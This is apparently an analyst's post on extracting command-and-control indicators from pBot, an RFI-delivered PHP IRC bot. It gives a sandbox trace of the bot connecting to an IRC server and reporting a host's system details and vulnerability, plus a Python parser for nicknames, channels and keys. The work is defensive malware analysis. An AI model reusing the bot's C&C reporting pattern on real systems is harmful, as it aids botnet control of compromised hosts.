I’m working on analyzing remote file inclusion (RFI) code. For the pBot class, which uses an IRC server for command and control (C&C), we are interested in getting the IP addresses of the C&C, the channel name and the nickname used to connect to the IRC server. Below is a sample of the output:
```
ok!
<fsockopen>(host=irc.server_name.net, port=6667, , , 30)</fsockopen>
<fwrite>( 1160 , "USER inul07429 127.0.0.1 localhost :Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 " , )</fwrite>
<fwrite>( 1160 , "NICK [E]inul92112 " , )</fwrite>
<fwrite>( 1160 , "MODE [E]inul92112 +ps" , )</fwrite>
<fwrite>( 1160 , "JOIN #knk !anime" , )</fwrite>
<fwrite>( 1160 , "PRIVMSG #trouxanime :[uname!]: Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 (safe: off)" , )</fwrite>
<fwrite>( 1160 , "PRIVMSG #trouxanime :[vuln!]: http://" , )</fwrite>
<fwrite>( 1160 , "NICK [E]inul97869" , )</fwrite>
<fwrite>( 1160 , "PONG :1508829909" , )</fwrite>
<fwrite>( 1160 , "PONG :1508829909" , )</fwrite>
<fwrite>( 1160 , "PONG :1508829909" , )</fwrite>
<fwrite>( 1160 , "PONG :1508829909" , )</fwrite>
```
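One way to pull the C&C host and port, nicknames and channels out of a trace in this format, as an added example that is not part of the original post. The sample trace is constructed, `parse_trace` and its field names are hypothetical, and the second JOIN argument is treated as the channel key per standard IRC syntax; resolving the host name to IP addresses is left out so the block runs offline.

```python
import re

# Constructed sample in the same <fsockopen>/<fwrite> trace format (not real data).
SAMPLE = '''ok!
<fsockopen>(host=irc.example.net, port=6667, , , 30)</fsockopen>
<fwrite>( 1160 , "USER bot01 127.0.0.1 localhost :Linux sandbox " , )</fwrite>
<fwrite>( 1160 , "NICK [E]bot12345 " , )</fwrite>
<fwrite>( 1160 , "JOIN #chan1 secretkey" , )</fwrite>
<fwrite>( 1160 , "PRIVMSG #chan2 :[uname!]: Linux sandbox" , )</fwrite>
<fwrite>( 1160 , "NICK [E]bot67890" , )</fwrite>
<fwrite>( 1160 , "PONG :1508829909" , )</fwrite>
'''

SOCK_RE = re.compile(r'<fsockopen>\(\s*host=([^,\s]+)\s*,\s*port=(\d+)')
# The payload may be wrapped in straight or typographic quotes, depending on
# how the trace was exported.
WRITE_RE = re.compile(
    r'<fwrite>\(\s*\d+\s*,\s*["\u201c](.*?)["\u201d]\s*,\s*\)</fwrite>', re.S)

def _add(seen, item):
    """Append item once, preserving first-seen order."""
    if item and item not in seen:
        seen.append(item)

def parse_trace(text):
    """Return C&C indicators found in a sandbox trace of a pBot-style script."""
    ioc = {"servers": [], "users": [], "nicks": [], "channels": [], "keys": []}
    for host, port in SOCK_RE.findall(text):
        _add(ioc["servers"], (host, int(port)))
    for payload in WRITE_RE.findall(text):
        parts = payload.split()
        if len(parts) < 2:
            continue
        cmd, args = parts[0].upper(), parts[1:]
        if cmd == "NICK":                       # bots often re-NICK on collision
            _add(ioc["nicks"], args[0])
        elif cmd == "USER":
            _add(ioc["users"], args[0])
        elif cmd == "JOIN":                     # JOIN <chan>[,<chan>] [<key>]
            for chan in args[0].split(","):
                _add(ioc["channels"], chan)
            if len(args) > 1:
                _add(ioc["keys"], args[1])
        elif cmd == "PRIVMSG" and args[0][0] in "#&":
            _add(ioc["channels"], args[0])      # reporting channel may differ
    return ioc

if __name__ == "__main__":
    print(parse_trace(SAMPLE))
```
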